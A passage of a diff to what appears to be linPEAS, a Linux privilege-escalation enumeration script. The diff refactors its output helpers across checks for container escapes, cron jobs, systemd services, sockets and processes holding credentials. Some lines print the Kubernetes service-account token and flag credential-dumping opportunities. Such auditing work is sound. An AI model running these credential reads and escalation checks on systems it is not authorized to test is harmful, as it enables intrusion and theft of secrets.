/proc/1/cpuset)\"`\n" + print_list "Container Full ID ..............$NC `basename \"$(cat /proc/1/cpuset)\"`\n" fi if [ "`echo \"$containerType\" | grep -i \"kubernetes\"`" ]; then - printf $Y"[+] "$GREEN"Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" - printf $Y"[+] "$GREEN"Kubernetes token ...............$NC `cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" + print_list "Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" + print_list "Kubernetes token ...............$NC `cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" fi checkContainerExploits - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," echo "" - printf $Y"[+] "$GREEN"Container Capabilities\n"$NC - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${C}[1;31m&${C}[0m,g" + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" echo "" - printf $Y"[+] "$GREEN"Privilege Mode\n"$NC + print_2title "Privilege Mode" if [ -x "$(command -v fdisk)" ]; then if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${C}[1;31;103m&${C}[0m," + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${C}[1;32m&${C}[0m," + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," fi else echo_not_found fi echo "" - printf $Y"[+] "$GREEN"Interesting Files Mounted\n"$NC + print_2title "Interesting Files Mounted" grep -Ev "$GREP_IGNORE_MOUNTS" /proc/self/mountinfo | cut -d' ' -f 4- echo "" - printf $Y"[+] "$GREEN"Possible Entrypoints\n"$NC + print_2title "Possible Entrypoints" ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo "" fi @@ -1326,18 +1415,18 @@ if [ "`echo $CHECKS | grep Devs`" ]; then ########################################### #---------------) Devices (---------------# ########################################### - printf $B"═════════════════════════════════════════╣ "$GREEN"Devices"$B" ╠══════════════════════════════════════════\n"$NC + print_title "Devices" #-- 1D) sd in /dev - printf $Y"[+] "$GREEN"Any sd*/disk* disk in /dev? (limit 20)\n"$NC - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${C}[1;31m&${C}[0m," | head -n 20 + print_2title "Any sd*/disk* disk in /dev? (limit 20)" + ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 echo "" #-- 2D) Unmounted - printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC - printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC + print_2title "Unmounted file-system?" + print_info "Check if you can mount umounted devices" if [ -f "/etc/fstab" ]; then - cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$notmounted,${C}[1;31m&${C}[0m," | sed -${E} "s,$mounted,${C}[1;34m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -${E} "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$mountpermsG,${C}[1;32m&${C}[0m,g" + cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" else echo_not_found "/etc/fstab" fi @@ -1351,16 +1440,16 @@ if [ "`echo $CHECKS | grep AvaSof`" ]; then ########################################### #---------) Available Software (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Available Software"$B" ╠════════════════════════════════════\n"$NC + print_title "Available Software" #-- 1AS) Useful software - printf $Y"[+] "$GREEN"Useful software\n"$NC - which $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null + print_2title "Useful software" + command -v $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null echo "" #-- 2AS) Search for compilers - printf $Y"[+] "$GREEN"Installed Compiler\n"$NC - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + print_2title "Installed Compiler" + (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi @@ -1371,26 +1460,26 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### - printf $B"══════════════════════════════╣ "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" ╠════════════════════════════════\n"$NC + print_title "Processes, Cron, Services, Timers & Sockets" #-- PCS) Cleaned proccesses - printf $Y"[+] "$GREEN"Cleaned processes\n"$NC + print_2title "Cleaned processes" if [ "$NOUSEPS" ]; then - printf $B"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + printf ${BLUE}"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi - printf $B"[i] "$Y"Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC + print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," pslist=`print_ps` else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then cpid="`echo \"$psline\" | awk '{print $2}'`" caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m,g" + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},g" fi fi done @@ -1398,193 +1487,189 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then echo "" #-- PCS) Binary processes permissions - printf $Y"[+] "$GREEN"Binary processes permissions\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC + print_2title "Binary processes permissions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" binW="IniTialiZZinnggg" ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then binW="$binW|$bpath" fi done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," fi echo "" #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Files opened by processes belonging to other users\n"$NC - printf $B"[i] "$Y"This is usually empty because of the lack of privileges to read other user processes information\n"$NC - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," echo "" fi - #-- PCS) Processes with credentials inside memory - printf $Y"[+] "$GREEN"Processes with credentials in memory (root req)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory\n"$NC - if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${C}[1;31m&${C}[0m,"; else echo_not_found "gdm-password"; fi - if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${C}[1;31m&${C}[0m,"; else echo_not_found "gnome-keyring-daemon"; fi - if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${C}[1;31m&${C}[0m,"; else echo_not_found "lightdm"; fi - if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${C}[1;31m&${C}[0m,"; else echo_not_found "vsftpd"; fi - if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${C}[1;31m&${C}[0m,"; else echo_not_found "apache2"; fi - if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${C}[1;31m&${C}[0m,"; else echo_not_found "sshd"; fi + #-- PCS) Processes with credentials inside memory + print_2title "Processes with credentials in memory (root req)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" + if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi echo "" #-- PCS) Different processes 1 min if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - printf $Y"[+] "$GREEN"Different processes executed during 1 min (interesting is low number of repetitions)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs\n"$NC + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" if [ "`ps -e -o command 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e -o command >> $file.tmp1 2>/dev/null; sleep 0.05; done; sort $file.tmp1 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi echo "" fi #-- PCS) Cron - printf $Y"[+] "$GREEN"Cron jobs\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs\n"$NC + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," command -v incrontab 2>/dev/null || echo_not_found "incrontab" incrontab -l 2>/dev/null - ls -al /etc/cron* 2>/dev/null | sed -${E} "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths echo "" #-- PCS) Services - printf $Y"[+] "$GREEN"Services\n"$NC - printf $B"[i] "$Y"Search for outdated versions\n"$NC + print_2title "Services" + print_info "Search for outdated versions" (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" #-- PSC) systemd PATH - printf $Y"[+] "$GREEN"Systemd PATH\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths\n"$NC - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" + print_2title "Systemd PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders"` echo "" #-- PSC) .service files #TODO: .service files in MACOS are folders - printf $Y"[+] "$GREEN"Analyzing .service files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#services\n"$NC - services=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.service') - printf "%s\n" "$services\n" | while read s; do + print_2title "Analyzing .service files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" + printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths printf "%s\n" "$servicebinpaths\n" | while read sp; do if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${C}[1;31;103m&${C}[0m,g" + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi done relpath1="`grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' \"$s\" 2>/dev/null | grep -Iv \"=/\"`" relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; else echo "$s is executing some relative path" fi fi fi done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${C}[1;32m&${C}[0m,"; fi + if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" - + #-- PSC) Timers - printf $Y"[+] "$GREEN"System timers\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found + print_2title "System timers" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found echo "" #-- PSC) .timer files - printf $Y"[+] "$GREEN"Analyzing .timer files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - timers=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.timer') - printf "%s\n" "$timers\n" | while read t; do - if [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + print_2title "Analyzing .timer files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" printf "%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${C}[1;31m&${C}[0m,g" + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" fi done #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${C}[1;31m&${C}[0m,g" + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" #done done echo "" #-- PSC) .socket files #TODO: .socket files in MACOS are folders - printf $Y"[+] "$GREEN"Analyzing .socket files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC - sockets=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.socket') - printf "%s\n" "$sockets" | while read s; do - if [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${C}[1;31m&${C}[0m,g" + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths="`grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" printf "%s\n" "$socketsbinpaths" | while read sb; do if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${C}[1;31m&${C}[0m,g" + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" fi done socketslistpaths="`grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" printf "%s\n" "$socketsbinpaths" | while read sl; do if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${C}[1;31m&${C}[0m,g"; + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; fi done done - if [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi - if [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi echo "" #-- PSC) Search HTTP sockets - printf $Y"[+] "$GREEN"HTTP sockets\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC + print_2title "HTTP sockets" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1 | while read s; do socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`" if [ $? -eq 0 ]; then owner="`ls -l \"$s\" | cut -d ' ' -f 3`" - echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" + echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "$socketcurl" fi done echo "" #-- PSC) Writable and weak policies in D-Bus config files - printf $Y"[+] "$GREEN"D-Bus config files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus\n"$NC - dbusfols=$(echo "$FIND_DIR_ETC" | grep -E '/dbus-1/system.d|/dbus-1/session.d') - if [ "$dbusfols" ]; then - printf "%s\n" "$dbusfols" | while read d; do + print_2title "D-Bus config files" + print_info 